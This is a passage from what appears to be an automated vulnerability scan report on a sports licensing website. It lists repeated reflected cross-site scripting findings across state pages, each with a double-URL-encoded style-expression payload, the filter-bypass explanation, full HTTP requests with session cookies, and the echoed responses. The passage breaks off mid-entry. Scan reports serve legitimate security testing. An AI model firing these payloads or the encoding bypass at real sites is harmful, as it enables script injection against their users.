NS_RTIMER_COMPOSITE: 334654614:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110184


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nebraska</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
nsing.com/s.nl?sc=77&category=175384&6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1&6e07a%27style%3d%27x%3aexpression%28alert%281%29%29%27040901e41e8=1&fromsla=T&6e07a'style='x:expression(alert(1))'040901e41e8=1'>
...[SNIP]...

2.213. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Nevada

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebfbe'style='x:expression(alert(1))'c4304c5bf67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Nevada?ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:16 GMT
NS_RTIMER_COMPOSITE: 1558098223:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=956
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54497


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nevada</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175385&ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1&ebfbe'style='x:expression(alert(1))'c4304c5bf67=1&ebfbe%27style%3d%27x%3aexpression%28alert%281%29%29%27c4304c5bf67=1&fromsla=T'>
...[SNIP]...

2.214. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-Hampshire

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c49'style='x:expression(alert(1))'4d9b5eac50e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-Hampshire?89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:17 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:16 GMT
NS_RTIMER_COMPOSITE: 328760091:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54525


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Hampshire</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175387&89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1&fromsla=T&89c49'style='x:expression(alert(1))'4d9b5eac50e=1&89c49%27style%3d%27x%3aexpression%28alert%281%29%29%274d9b5eac50e=1'>
...[SNIP]...

2.215. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-Jersey

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ebf4'style='x:expression(alert(1))'1fb26256c52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-Jersey?3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:33 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1666357906:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=988
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110394


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Jersey</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175388&3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1&3ebf4%27style%3d%27x%3aexpression%28alert%281%29%29%271fb26256c52=1&3ebf4'style='x:expression(alert(1))'1fb26256c52=1&fromsla=T'>
...[SNIP]...

2.216. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-Mexico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf719'style='x:expression(alert(1))'81128e78a9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-Mexico?bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1590876485:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=940
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110232


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Mexico</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175389&bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1&bf719'style='x:expression(alert(1))'81128e78a9f=1&bf719%27style%3d%27x%3aexpression%28alert%281%29%29%2781128e78a9f=1&fromsla=T'>
...[SNIP]...

2.217. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-York

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fed0'style='x:expression(alert(1))'69b8cb3cf13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-York?1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:35 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 334656480:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=996
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111485


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New York</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175390&1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1&1fed0'style='x:expression(alert(1))'69b8cb3cf13=1&1fed0%27style%3d%27x%3aexpression%28alert%281%29%29%2769b8cb3cf13=1&fromsla=T'>
...[SNIP]...

2.218. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/North-Carolina

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 650fc'style='x:expression(alert(1))'1f5f4cac11d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/North-Carolina?650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:33 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 226401215:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=939
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111006


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>North Carolina</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
nsing.com/s.nl?sc=77&category=175392&650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1&650fc%27style%3d%27x%3aexpression%28alert%281%29%29%271f5f4cac11d=1&fromsla=T&650fc'style='x:expression(alert(1))'1f5f4cac11d=1'>
...[SNIP]...

2.219. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/North-Dakota

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fdb3'style='x:expression(alert(1))'d6800f7fe01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/North-Dakota?4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:24 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 772662588:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54521


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>North Dakota</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175668&4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1&4fdb3'style='x:expression(alert(1))'d6800f7fe01=1&fromsla=T&4fdb3%27style%3d%27x%3aexpression%28alert%281%29%29%27d6800f7fe01=1'>
...[SNIP]...

2.220. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Ohio

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6304b'style='x:expression(alert(1))'d67f8a8edb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Ohio?6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 772666872:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=956
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110948


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ohio</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175669&6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1&fromsla=T&6304b'style='x:expression(alert(1))'d67f8a8edb6=1&6304b%27style%3d%27x%3aexpression%28alert%281%29%29%27d67f8a8edb6=1'>
...[SNIP]...

2.221. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Oklahoma

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9598'style='x:expression(alert(1))'673ea07282e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Oklahoma?f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1222459890:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=934
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110378


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Oklahoma</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175670&f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1&f9598%27style%3d%27x%3aexpression%28alert%281%29%29%27673ea07282e=1&f9598'style='x:expression(alert(1))'673ea07282e=1&fromsla=T'>
...[SNIP]...

2.222. http://www.turnerlicensing.com/teams_by_state/Oregon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Oregon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3239c'style='x:expression(alert(1))'0a7c4969562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Oregon?3239c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270a7c4969562=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
